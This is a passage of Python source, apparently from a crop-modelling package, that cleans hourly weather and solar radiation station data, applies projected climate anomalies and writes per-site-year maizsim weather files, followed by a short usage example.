df.precip_perhr = df.precip_depth/df.precip_time
# Account for cases where precip_hr = 0
# which produces infinite precip_perhr
df.precip_perhr = df.precip_perhr.replace({np.inf: np.nan})
# Unit conversion
df.temp = np.round(df.temp/10, 2)
df.dew_temp = np.round(df.dew_temp/10, 2)
df.precip_perhr = np.round(df.precip_perhr/10, 1)
# Apply climate treatment if requested
if climate_treatment is not None:
try:
lat = df_sites.query(
f'USAF == {siteid_usaf}')['ISH_LAT (dd)'].item()
lon = df_sites.query(
f'USAF == {siteid_usaf}')['ISH_LON(dd)'].item()
months = list(df.index.month)
scales_temp = scale_climate(lat, lon, months, 'T')
scales_rh = scale_climate(lat, lon, months, 'RH')
# Calculate temperature anomalies based on scaling pattern
# based on CMIP6 SSP3-7.0 scenario
if climate_treatment == 2050:
temp_anomaly = 1.4
precip_anomaly = 0.85 # 15% reduction
elif climate_treatment == 2100:
temp_anomaly = 3.1
precip_anomaly = 0.7 # 30% reduction
# Fetch temperature anomalies
temp_anomalies = [
scale * temp_anomaly for scale in scales_temp]
# Apply temperature anomalies
temp_presentday = df.temp
temp_future = np.round(temp_presentday + temp_anomalies, 2)
df.temp = temp_future
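# Illustrative numbers (not from the source data): with a local scaling
# ratio of 1.2 and the 2050 anomaly of 1.4 degC, an hourly temperature
# of 25.00 degC becomes 25.00 + 1.2 * 1.4 = 26.68 degC.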
except ValueError:
print(year, name.split('/')[-1])
# calculate RH through Clausius Clapeyron
df.rh = CC_RH(df.temp, df.dew_temp)
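# RH is the ratio of actual to saturation vapor pressure,
# e(T_dew) / e_s(T_air) * 100; CC_RH (imported from ideotype.utils)
# presumably applies a Clausius-Clapeyron / Magnus-type approximation
# for the saturation vapor pressures.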
if df[df.rh > 100].rh.sum() > 100:
print('rh > 100: ', year, name)
# fetch RH anomalies
rh_anomalies = [
scale * temp_anomaly for scale in scales_rh]
# apply RH anomalies
rh_presentday = df.rh
rh_future = np.round(rh_presentday + rh_anomalies, 2)
df.rh = rh_future
# apply precip anomalies
precip_presentday = df.precip_perhr
precip_future = np.round(precip_presentday * precip_anomaly, 2)
df.precip_perhr = precip_future
# stack site data
arr_temp_sites = np.vstack([arr_temp_sites, df.temp])
arr_rh_sites = np.vstack([arr_rh_sites, df.rh])
arr_precip_sites = np.vstack([arr_precip_sites, df.precip_perhr])
# Convert all data for single year into pd.DataFrame
df_temp_sites = pd.DataFrame(arr_temp_sites.transpose(), index=times)
df_temp_sites.drop(df_temp_sites.columns[0], axis=1, inplace=True)
df_temp_sites.columns = siteid_all
df_temp_sites.sort_index(axis=1, inplace=True)
df_rh_sites = pd.DataFrame(arr_rh_sites.transpose(), index=times)
df_rh_sites.drop(df_rh_sites.columns[0], axis=1, inplace=True)
df_rh_sites.columns = siteid_all
df_rh_sites.sort_index(axis=1, inplace=True)
df_precip_sites = pd.DataFrame(
arr_precip_sites.transpose(), index=times)
df_precip_sites.drop(df_precip_sites.columns[0], axis=1, inplace=True)
df_precip_sites.columns = siteid_all
df_precip_sites.sort_index(axis=1, inplace=True)
# Output data for each year
df_temp_sites.to_csv(os.path.join(basepath, f'temp_{year}.csv'))
df_rh_sites.to_csv(os.path.join(basepath, f'rh_{year}.csv'))
df_precip_sites.to_csv(os.path.join(basepath, f'precip_{year}.csv'))
def read_solrad(year_start, year_end):
"""
Read in raw hourly solar radiation data.
- Data source: NSRDB
- Source: https://nsrdb.nrel.gov/about/u-s-data.html
- METSTAT Glo (Wh/m2):
Total amount of direct and diffuse solar radiation (METSTAT-modeled)
received on a horizontal surface during the 60-minute period
ending at the timestamp (refer to NSRDB data manual p.15 Table 3)
- Raw data stored: ~/data/ISH_NSRD/
- Output csv files stored: ~/upscale/weadata/process/
* note:
For years 1991-2010, only select data from class 1
(refer to NSRDB manual p.7-8 for more details)
- class 1: have complete period of record of 1991-2010.
- class 2: have complete period of record but with
significant periods of interpolated, filler,
or otherwise low-quality input data for solar models.
- class 3: have some gaps in the period of record
but have at least 3 years of data.
Parameters
----------
year_start : int
year_end : int
"""
# Read in relevant file paths
fpaths_wea = os.path.join(DATA_PATH, 'files', 'filepaths_wea.yml')
with open(fpaths_wea) as pfile:
dict_fpaths = yaml.safe_load(pfile)
# Set up basepath
basepath = dict_fpaths['basepath']
# Read in info on conversion between WBAN & USAF id numbering system
fpath_id_conversion = os.path.join(
DATA_PATH, 'sites', dict_fpaths['id_conversion'])
df_stations = pd.read_csv(fpath_id_conversion, header=None, dtype=str)
df_stations.columns = ['WBAN', 'USAF']
stations_usaf = df_stations.USAF
# Set up years
if year_start == year_end:
years = [year_start]
else:
years = np.arange(year_start, year_end+1)
# Dataframe setup for years 1961-1990
colnames = ['year', 'month', 'day', 'hour', 'solrad']
colspecs = [(1, 3), (4, 6), (7, 9), (10, 12), (23, 27)]
# Loop through years to read in data
for year in years:
print(year) # track progress
# Check first if file exists already
if os.path.isfile(os.path.join(basepath, f'solrad_{year}.csv')):
raise ValueError(f'solrad_{year}.csv exists!')
# Set up default timeline
season_start = '02-01-'
season_end = '11-30-'
datetimes_season = pd.date_range(
f'{season_start + str(year)}',
f'{season_end + str(year)} 23:00:00', freq='1H')
# Initiate empty array to store data
arr_solrad_sites = np.zeros(shape=len(datetimes_season),)
# initiate empty list to store all site ids (USAF)
siteid_all = []
# For years 1961-1990
if year < 1991:
# Fetch all file names within year
fnames = glob.glob(
os.path.join(os.path.expanduser('~'),
'data', 'ISH_NSRD', str(year), '*'))
for name in fnames:
siteid_wban = name.split('/')[-1].split('_')[0]
siteid_usaf = df_stations.query(
f'WBAN == "{siteid_wban}"').USAF.item()
siteid_all.append(siteid_usaf)
# Read in fixed-width data
df = pd.read_fwf(name,
skiprows=[0],
header=None,
names=colnames,
colspecs=colspecs)
# Structure date-time info
datetimes = df.apply(lambda row: datetime(
year, row['month'], row['day'], row['hour']-1), axis=1)
# Fetch solrad - Global Horizontal Radiation (Wh/m2)
df_solrad = pd.DataFrame(df.solrad)
df_solrad.index = datetimes
# Remove duplicated hours, keeping only first occurrence
# keep = 'first': marks duplicate as True
# except for first occurrence
# ~: not selecting for True ends up selecting
# for the non-duplicated indexes
df_solrad = df_solrad[
~df_solrad.index.duplicated(keep='first')]
# Add in missing time values
# Correct for leap years
# Filter only for growing season
df_solrad = df_solrad.reindex(datetimes_season,
fill_value=np.nan)
# Replace missing data with NaN
df_solrad.replace({9999: np.nan}, inplace=True)
arr_solrad_sites = np.vstack(
[arr_solrad_sites, df_solrad.solrad])
# Convert all data for single year into pd.DataFrame
df_solrad_sites = pd.DataFrame(
arr_solrad_sites.transpose(), index=datetimes_season)
df_solrad_sites.drop(
df_solrad_sites.columns[0], axis=1, inplace=True)
df_solrad_sites.columns = siteid_all
df_solrad_sites.sort_index(axis=1, inplace=True)
# Output data for each year
df_solrad_sites.to_csv(
os.path.join(basepath, f'solrad_{year}.csv'))
# For years 1991-2010:
else:
for station in stations_usaf:
# Search for specified year-site data
fname = glob.glob(os.path.join(
os.path.expanduser('~'),
'data', 'ISH_NSRD', str(year), f'{station}_*.csv'))
if len(fname) == 1:
# Read in file
df = pd.read_csv(fname[0])
siteid_all.append(station)
else:
print('multiple files!', fname)
# Format date-time info
dates = df['YYYY-MM-DD']
hours = df['HH:MM (LST)']
hours = [int(hour.split(':')[0])-1 for hour in hours]
datetimes = [datetime.strptime(
dates[item] + '-' + str(hours[item]),
'%Y-%m-%d-%H') for item in np.arange(df.shape[0])]
# Fetch solrad - Global Horizontal Radiation (Wh/m2)
df_solrad = pd.DataFrame(df['METSTAT Glo (Wh/m^2)'])
df_solrad.columns = ['solrad']
df_solrad.index = datetimes
# Remove duplicated hours, keeping only first occurrence
# keep = 'first': marks duplicate as True
# except for first occurrence
# ~: not selecting for True ends up selecting
# for the non-duplicated indexes
df_solrad = df_solrad[
~df_solrad.index.duplicated(keep='first')]
# Add in missing time values
# Correct for leap years
# Filter only for growing season
df_solrad = df_solrad.reindex(datetimes_season,
fill_value=np.nan)
# Replace missing data with NaN
df_solrad.replace({9999: np.nan}, inplace=True)
# Stacking all data as arrays to make sure
# all dimensions are correct
arr_solrad_sites = np.vstack(
[arr_solrad_sites, df_solrad.solrad])
# Convert all data for single year into pd.DataFrame
df_solrad_sites = pd.DataFrame(
arr_solrad_sites.transpose(), index=datetimes_season)
df_solrad_sites.drop(
df_solrad_sites.columns[0], axis=1, inplace=True)
df_solrad_sites.columns = siteid_all
df_solrad_sites.sort_index(axis=1, inplace=True)
# Output data for each year
df_solrad_sites.to_csv(
os.path.join(basepath, f'solrad_{year}.csv'))
def wea_combine(basepath):
"""
Combine weather data for all years.
Parameters
----------
basepath : str
path where all weather data csv files are stored.
"""
# Set up loop iterables
csv_files = ['temp_*.csv', 'rh_*.csv', 'precip_*.csv', 'solrad_*.csv']
csv_names = ['temp_all.csv', 'rh_all.csv',
'precip_all.csv', 'solrad_all.csv']
for csvs, csv_name in zip(csv_files, csv_names):
print(csv_name)
# Check if compiled csv file exists already
if os.path.isfile(os.path.join(basepath, csv_name)):
print(f'{csv_name} exists already!')
# Combine data for all years
else:
fnames = glob.glob(os.path.join(basepath, csvs))
# Read in and concat data from all years
df_all = pd.concat(
[pd.read_csv(name, index_col=0) for name in fnames])
# Order df by column so sites are ascending
df_all.sort_index(axis=1, inplace=True)
# Order df by index so time is ordered
# * note: glob.glob doesn't always grab filenames in
# the order you might think so better to order
# in this case, solrad was not ordered by year
df_all.sort_index(axis=0, inplace=True)
# Output concatenated and sorted dataframe
df_all.to_csv(os.path.join(basepath, csv_name))
def wea_preprocess(basepath):
"""
Process weather data.
Parameters
----------
basepath: str
path to access weather data
Returns
-------
df_temp
df_rh
df_precip
df_solrad
"""
# Read in processed weather data
df_temp = pd.read_csv(
os.path.join(basepath, 'temp_all.csv'),
index_col=0, parse_dates=True)
df_rh = pd.read_csv(
os.path.join(basepath, 'rh_all.csv'),
index_col=0, parse_dates=True)
df_precip = pd.read_csv(
os.path.join(basepath, 'precip_all.csv'),
index_col=0, parse_dates=True)
df_solrad = pd.read_csv(
os.path.join(basepath, 'solrad_all.csv'),
index_col=0, parse_dates=True)
# Identify overlapping stations (columns) between
# temp/rh/precip dataset & solrad dataset
cols1 = df_temp.columns
cols2 = df_solrad.columns
sites = list(cols1.intersection(cols2))
# Filter for overlapping sites only
df_temp = df_temp.loc[:, sites]
df_rh = df_rh.loc[:, sites]
df_precip = df_precip.loc[:, sites]
df_solrad = df_solrad.loc[:, sites]
return(df_temp, df_rh, df_precip, df_solrad)
def wea_siteyears(df_temp, df_rh, df_precip, df_solrad,
gseason_start, gseason_end, crthr):
"""
Identify valid site-years that satisfy critical hours for gap-filling.
Parameters
----------
df_temp : pd.DataFrame
df_rh : pd.dataFrame
df_precip : pd.DataFrame
df_solrad : pd.DataFrame
gseason_start : int
Start of growing season (month)
gseason_end : int
End of growing season (month)
crthr : int
critical hours for gap-filling
Returns
-------
siteyears : list
"""
# Identify site-years that satisfy critical hours for gap-filling
dfs = [df_temp, df_rh, df_precip, df_solrad]
final_list = []
years = np.arange(1961, 2011)
sites = list(df_temp.columns)
for df in dfs:
siteyears_all = list()
for year in years:
# Filter out specific year
df_year = df[(df.index.year == year) &
(df.index.month >= gseason_start) &
(df.index.month <= gseason_end)]
siteyears = list()
for site in sites:
# Filter out specific site-year
df_siteyear = pd.DataFrame(df_year.loc[:, site])
# 4000: ~55% of the number of rows
# Used as a threshold to toss out site-years
# that have too many gaps to fill
# even if they satisfy the critical hours.
# This is set since I noticed some sites have data
# recorded every 3 hrs.
# Valid data collection method, but I wanted to avoid
# having to gap-fill throughout that time period,
# especially for precipitation.
lim = 4000
# Only continue processing if have less than ~55% of NaNs
if int(df_siteyear.isna().sum()) < lim:
# Identify whether data entry is NaN
# df.notnull() returns TRUE or FALSE,
# astype(int) turns TRUE into 1, and FALSE into 0
df_siteyear['present'] = df_siteyear.notnull().astype(int)
# Calculate cumulative sum based on whether data is
# Nan value (1) or not (0)
# If there are consecutive missing data,
# the cumulative sum for those two rows will be the same,
# and can further be used for grouping purposes
# to count the number of consecutive missing rows
# within each streak of missing data.
df_siteyear['csum'] = df_siteyear.present.cumsum()
# Select individual timesteps that have missing data
df_siteyear = df_siteyear[
df_siteyear.loc[:, site].isnull()]
# Count the number of consecutive NaNs
nans_list = df_siteyear.groupby('csum')['csum'].count()
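# Worked example (illustrative): if present = [1, 0, 0, 1, 0], then
# csum = [1, 1, 1, 2, 2]; keeping only the NaN rows and counting by
# csum gives {1: 2, 2: 1}, i.e. one streak of two consecutive missing
# hours and one isolated missing hour.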
# Only record site-years that have fewer consecutive NaNs
# than the critical value set
if nans_list[nans_list > crthr].shape[0] == 0:
use_siteyear = str(year) + '_' + str(site)
siteyears.append(use_siteyear)
siteyears_all.extend(siteyears)
final_list.append(siteyears_all)
# Assign site-years
siteyears_temp = final_list[0]
siteyears_rh = final_list[1]
siteyears_precip = final_list[2]
siteyears_solrad = final_list[3]
# Identify all overlapping site-years
siteyears = list(
set(siteyears_temp) &
set(siteyears_rh) &
set(siteyears_precip) &
set(siteyears_solrad))
return(siteyears)
def wea_filter(siteyears, area_threshold, irri_threshold, yearspersite):
"""
Filter valid site-years based on location, area & irri.
- Location: limit to continental US (boundaries -123, -72, 19, 53)
- Planting area
- Irrigation area
- Estimated pdate
Parameters
----------
siteyears : list
Output of site-years from wea_preprocess()
area_threshold : int
Planting area threshold.
irri_threshold : int
Threshold for percent land irrigated.
yearspersite : int
Minimum number of years of data for each site.
"""
# Identify total number of unique sites within valid site-years
sites = list(set([siteyear.split('_')[1] for siteyear in siteyears]))
sites.sort()
# Read in relevant file paths
fpaths_wea = os.path.join(DATA_PATH, 'files', 'filepaths_wea.yml')
with open(fpaths_wea) as pfile:
dict_fpaths = yaml.safe_load(pfile)
# Read in stations info
fpath_stations_info = os.path.join(
DATA_PATH, 'sites', dict_fpaths['stations_info'])
df_stations = pd.read_csv(fpath_stations_info, dtype={'USAF': str})
# Summarize nass data to fetch planting area & percent irrigated info
df_nass = nass_summarize(1961, 2005)
# Continental US site boundaries
lat_min = 19
lat_max = 53
lon_min = -123
lon_max = -72
# Initiate empty list
areas = []
perct_irris = []
sites_inbound = []
sites_outbound = []
for site in sites:
# Fetch site lat/lon info
lat = df_stations.query(f'USAF == "{site}"')['ISH_LAT (dd)'].item()
lon = df_stations.query(f'USAF == "{site}"')['ISH_LON(dd)'].item()
# Only include sites within continental US boundaries
if (lat_min <= lat <= lat_max) & (lon_min <= lon <= lon_max):
# Append sites within bound
sites_inbound.append(site)
# Calculate distance between site & all nass sites
dist = list(enumerate(
np.sqrt((lat - df_nass.lat)**2 + (lon - (df_nass.lon))**2)))
df_dist = pd.DataFrame(dist, columns=['rownum', 'distance'])
# select the five nearest locations and average for
# cropping area & irrigation percentage
rows = list(df_dist.nsmallest(5, 'distance').rownum)
area = df_nass.iloc[rows].area.mean()
perct_irri = df_nass.iloc[rows].perct_irri.mean()
areas.append(area)
perct_irris.append(perct_irri)
else:
sites_outbound.append(site)
# add planting area & irrigation info for filtering purposes
df_filter = pd.DataFrame({'site': sites_inbound,
'area': areas,
'perct_irri': perct_irris})
sites_filtered = df_filter.query(
f'(area > {area_threshold}) & (perct_irri < {irri_threshold})').site
# Turn siteyears into dataframe for easier processing
siteyear_years = [siteyear.split('_')[0] for siteyear in siteyears]
siteyear_sites = [siteyear.split('_')[1] for siteyear in siteyears]
df_siteyears = pd.DataFrame({'site': siteyear_sites,
'year': siteyear_years})
# Filter siteyears based on area & percent irrigated
siteyears_filtered = df_siteyears[df_siteyears.site.isin(sites_filtered)]
# Filter out sites that have fewer than `yearspersite` years of data
df_count = pd.DataFrame(siteyears_filtered.groupby('site').count())
sites_discard = list(df_count.query(f'year < {yearspersite}').index)
siteyears_filtered = siteyears_filtered[
~siteyears_filtered.site.isin(sites_discard)]
return(siteyears_filtered)
def make_weafile(siteyears_filtered,
df_temp, df_rh, df_precip, df_solrad,
outpath,
climate_treatment=None):
"""
Make individual maizsim weather files.
* Note on handling time zone issues:
- ISH data (temp, rh, precip): recorded in UTC time
- NSRB data (solrad): recorded in local time
* Process:
1. Select ISH data (temp, rh, precip) based on UTC time
2. Convert UTC datetime info into local datetime
3. Write out local datetime info as the date-time columns in maizsim
4. Select solrad data based on local datetime
Parameters
----------
siteyears_filtered : list
List of valid & filtered siteyears
"""
# Read in station info
fpaths_wea = os.path.join(DATA_PATH, 'files', 'filepaths_wea.yml')
with open(fpaths_wea) as pfile:
dict_fpaths = yaml.safe_load(pfile)
# Read in info on conversion between WBAN & USAF id numbering system
fpath_stations_info = os.path.join(
DATA_PATH, 'sites', dict_fpaths['stations_info'])
df_stations = pd.read_csv(fpath_stations_info, dtype={'USAF': str})
# Package needed to find timezone
tf = TimezoneFinder()
for row in np.arange(siteyears_filtered.shape[0]):
# year & site
year = siteyears_filtered.iloc[row]['year']
site = siteyears_filtered.iloc[row]['site']
# lat & lon
lat = df_stations.query(f'USAF == "{site}"')['ISH_LAT (dd)'].item()
lon = df_stations.query(f'USAF == "{site}"')['ISH_LON(dd)'].item()
# Find and define timezone
zone = tf.timezone_at(lng=lon, lat=lat)
from_zone = tz.gettz('UTC')
to_zone = tz.gettz(zone)
# Construct dataframe that will hold all weather data
col = ['jday', 'date', 'hour',
'solrad', 'temp', 'precip', 'rh', 'co2']
df_wea = pd.DataFrame(columns=col)
# UTC datetimes
season_start = '02-02-'
season_end = '11-30-'
timestamps = pd.date_range(f'{season_start + year}',
f'{season_end + year} 23:00:00',
freq='1H')
# Convert timestamp into datetime object
datetimes = [tstamp.to_pydatetime() for tstamp in timestamps]
# Assign datetime object UTC timezone
datetimes_utc = [
dt.replace(tzinfo=from_zone) for dt in datetimes]
# Convert UTC datetime to local datetime
datetimes_local = [
dt_utc.astimezone(to_zone) for dt_utc in datetimes_utc]
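# Illustrative conversion (assumed site): 2000-02-01 06:00 UTC at a
# US/Central station becomes 2000-02-01 00:00 local standard time
# (UTC-6), and the local datetime is what gets written to the
# maizsim weather file.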
# Put together df_wea:
# 1. Select temp, rh, & precip data based on original timestamps (UTC)
df_wea.temp = list(df_temp.loc[timestamps, site])
df_wea.rh = list(df_rh.loc[timestamps, site])
df_wea.precip = list(df_precip.loc[timestamps, site])
# CO2 levels for future climate
if climate_treatment is not None:
if climate_treatment == 2050:
df_wea.co2 = 550
elif climate_treatment == 2100:
df_wea.co2 = 850
else:
df_wea.co2 = 400
# 2. Use converted local datetime as time info in df_wea
df_wea.jday = [int(datetime.strftime(
dt_local, '%j')) for dt_local in datetimes_local]
df_wea.date = [datetime.strftime(
dt_local, "'%m/%d/%Y'") for dt_local in datetimes_local]
df_wea.hour = [dt_local.hour for dt_local in datetimes_local]
# 3. Select solrad data based on converted local datetime
timestamps_local = [datetime.strftime(
dt_local, '%Y-%m-%d %H:%M:%S') for dt_local in datetimes_local]
df_wea.solrad = list(df_solrad.loc[timestamps_local, site])
# Gap-fill df_wea
df_wea.interpolate(axis=0, inplace=True)
# Round values one last time for uniform weather data
# otherwise interpolated points will end up with long floating nums
df_wea = df_wea.round({'solrad': 1, 'temp': 1, 'precip': 1, 'rh': 2})
# Remove artificial duplicated jday-hour row created
# due to daylight saving (~jday 300)
# * note: this is not a complete duplicate of rows
# * since the data are actually from a different hour
# * however, the jday-time index become duplicated
# * and may cause issues in maizsim
# * and definitely cause problems when inserting
# * weather data into database
jday_time = [
f'{df_wea.jday[row]}_{df_wea.hour[row]}'
for row in np.arange(df_wea.shape[0])]
df_jdaytime = pd.DataFrame(jday_time)
index_to_drop = df_jdaytime[df_jdaytime.duplicated()].index.values
# Drop duplicated jday_time row only if it exists
if index_to_drop.size > 0:
df_wea.drop(index=index_to_drop, inplace=True)
# Edge case where first row is nan and was not interpolated
if df_wea.isna().sum().sum() > 0:
print(f'Require additional gap fill: {site}_{year}')
# Write out df_wea for each site-year
wea_txt = os.path.join(outpath, f'{site}_{year}.txt')
if os.path.exists(wea_txt):
print(f'{site}_{year}.txt exists!')
else:
df_wea.to_csv(wea_txt, sep='\t', index=False)
def wea_summarize(siteyears_filtered,
df_temp, df_rh, df_precip, df_solrad,
gseason_start, gseason_end):
"""
Summarize growing season weather data.
* note: linear interpolation prior to summarizing
- mean climate conditions
- variability within climate: variance/mean
Parameters
----------
df_temp : pd.DataFrame
df_rh : pd.DataFrame
df_precip : pd.DataFrame
df_solrad : pd.DataFrame
Returns
-------
df_wea_summary : pd.DataFrame
Summary weather data info.
"""
temp_all = [np.nan]*siteyears_filtered.shape[0]
tempvar_all = [np.nan]*siteyears_filtered.shape[0]
rh_all = [np.nan]*siteyears_filtered.shape[0]
rhvar_all = [np.nan]*siteyears_filtered.shape[0]
precip_all = [np.nan]*siteyears_filtered.shape[0]
precipvar_all = [np.nan]*siteyears_filtered.shape[0]
solrad_all = [np.nan]*siteyears_filtered.shape[0]
solradvar_all = [np.nan]*siteyears_filtered.shape[0]
for item in np.arange(siteyears_filtered.shape[0]):
# year & site
year = siteyears_filtered.iloc[item]['year']
site = siteyears_filtered.iloc[item]['site']
# Temperature
df = df_temp
temp = list(df[
(df.index.year == int(year)) &
(gseason_start <= df.index.month) &
(df.index.month < gseason_end)][site].interpolate(axis=0))
temp_mean = round(np.nanmean(temp), 2)
temp_var = np.nanvar(temp)/temp_mean
temp_all[item] = temp_mean
tempvar_all[item] = temp_var
# RH
df = df_rh
rh = list(df[
(df.index.year == int(year)) &
(gseason_start <= df.index.month) &
(df.index.month < gseason_end)][site].interpolate(axis=0))
rh_mean = round(np.nanmean(rh), 2)
rh_var = np.nanvar(rh)/rh_mean
rh_all[item] = rh_mean
rhvar_all[item] = rh_var
# Precip
df = df_precip
precip = list(df[
(df.index.year == int(year)) &
(gseason_start <= df.index.month) &
(df.index.month < gseason_end)][site].interpolate(axis=0))
precip_mean = round(sum(precip), 2)
precip_var = np.nanvar(precip)/precip_mean
precip_all[item] = precip_mean
precipvar_all[item] = precip_var
# Solrad
df = df_solrad
solrad = list(df[
(df.index.year == int(year)) &
(gseason_start <= df.index.month) &
(df.index.month < gseason_end)][site].interpolate(axis=0))
solrad_mean = round(np.nanmean(solrad), 2)
solrad_var = np.nanvar(solrad)/solrad_mean
solrad_all[item] = solrad_mean
solradvar_all[item] = solrad_var
# Calculate VPD based on temperature & RH
vpd_all = [
round(CC_VPD(temp, rh/100), 2) for temp, rh in zip(temp_all, rh_all)]
# Compile summarized growing season met info into dataframe
df_wea_all = pd.DataFrame({'temp': temp_all,
'temp_var': tempvar_all,
'rh': rh_all,
'rh_var': rhvar_all,
'vpd': vpd_all,
'precip': precip_all,
'precip_var': precipvar_all,
'solrad': solrad_all,
'solrad_var': solradvar_all})
df_siteyears = siteyears_filtered.reset_index(drop=True)
df_wea_summary = df_siteyears.join(df_wea_all)
return(df_wea_summary)
def get_scale_ratio(run_name, climate_factor, month):
"""
Determine temperature scaling pattern for future climate.
Parameters
----------
run_name : str
Simulation run name.
climate_factor : str
- 'T'
- 'RH'
month : int
Month of data (0 - Jan, 11 - Dec)
Returns
-------
temp_scale : list
List of scaling ratios for temp projection.
"""
dirct_yaml = os.path.join(DATA_PATH, 'files', f'filepaths_{run_name}.yml')
dirct_temp_scaling = os.path.join(
os.path.expanduser('~'),
'data',
f'{climate_factor}_scalepattern',
f'{climate_factor}_scaling_mon{month}.nc')
df_sims, df_sites, df_wea, df_params, df_all, df_matured = read_data(
dirct_yaml)
ds = xr.open_dataset(dirct_temp_scaling)
# lat/lon for sim sites
site_lats = df_sites.lat
# convert lon from -180/180 into 0/360
site_lons = [round(lon % 360, 2) for lon in df_sites.lon]
# lat/lon for temp scaling pattern
lats = ds.lat.values
lons = ds.lon.values
lats_index = []
lons_index = []
# Determine closest temp pattern lat/lon index
for site_lat, site_lon in zip(site_lats, site_lons):
# latitude
min_lat_diff = min([abs(lat - site_lat) for lat in lats])
nearest_lat_index = [
abs(lat - site_lat) for lat in lats].index(min_lat_diff)
lats_index.append(nearest_lat_index)
# longitude
min_lon_diff = min([abs(lon - site_lon) for lon in lons])
nearest_lon_index = [
abs(lon - site_lon) for lon in lons].index(min_lon_diff)
lons_index.append(nearest_lon_index)
# Filter out temperature scaling ratio
temp_scales = []
for lat_index, lon_index in zip(lats_index, lons_index):
temp_scale = ds.ratio.isel(lat=lat_index).isel(lon=lon_index).item()
temp_scales.append(temp_scale)
return(temp_scales)
def scale_climate(site_lat, site_lon, months, climate_factor):
"""
Scale climate factor in weather data file.
Based on the projected climate-factor pattern determined
through get_scale_ratio.
Parameters
----------
site_lat : float
Latitude of selected location.
site_lon : float
Longitude of selected location.
months : list
List of ints, month of data (1 - Jan, 12 - Dec).
climate_factor : str
- 'T'
- 'RH'
"""
# Read in scaling data for each month
months_in_year = np.arange(12)
dss = [np.nan]*len(months_in_year)
for item, month_in_year in enumerate(months_in_year):
dirct_climate_scaling = os.path.join(
os.path.expanduser('~'),
'data',
f'{climate_factor}_scalepattern',
f'{climate_factor}_scaling_mon{month_in_year}.nc')
ds = xr.open_dataset(dirct_climate_scaling)
dss[item] = ds
# Fetch scales for all months
scale_each_month = []
for item in months_in_year:
# dataset for specific month
ds = dss[item]
# lat/lon for temp scaling pattern
lats = ds.lat.values
lons = ds.lon.values
# convert site lon from -180/180 into 0/360
site_lon = round(site_lon % 360, 2)
# Determine closest temp pattern lat/lon index
# latitude
min_lat_diff = min([abs(lat - site_lat) for lat in lats])
nearest_lat_index = [
abs(lat - site_lat) for lat in lats].index(min_lat_diff)
# longitude
min_lon_diff = min([abs(lon - site_lon) for lon in lons])
nearest_lon_index = [
abs(lon - site_lon) for lon in lons].index(min_lon_diff)
# Filter out temperature scaling ratio
climate_scale = ds.ratio.isel(
lat=nearest_lat_index).isel(lon=nearest_lon_index).item()
scale_each_month.append(climate_scale)
# Compile final scales
scales = [scale_each_month[month-1] for month in months]
return(scales)
```
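A hedged end-to-end sketch of the weather workflow defined above; paths, growing-season months, and filter thresholds are illustrative assumptions, not values from the source.
```python
# All paths and thresholds below are hypothetical.
from ideotype.weafile_process import (wea_combine, wea_preprocess,
                                      wea_siteyears, wea_filter,
                                      make_weafile)

basepath = '/home/user/upscale/weadata/process'
wea_combine(basepath)  # concatenate per-year csv files into *_all.csv
df_temp, df_rh, df_precip, df_solrad = wea_preprocess(basepath)

siteyears = wea_siteyears(df_temp, df_rh, df_precip, df_solrad,
                          gseason_start=4, gseason_end=10, crthr=6)
siteyears_filtered = wea_filter(siteyears,
                                area_threshold=10000,
                                irri_threshold=50,
                                yearspersite=10)

make_weafile(siteyears_filtered, df_temp, df_rh, df_precip, df_solrad,
             outpath='/home/user/upscale/weadata/data/control')
```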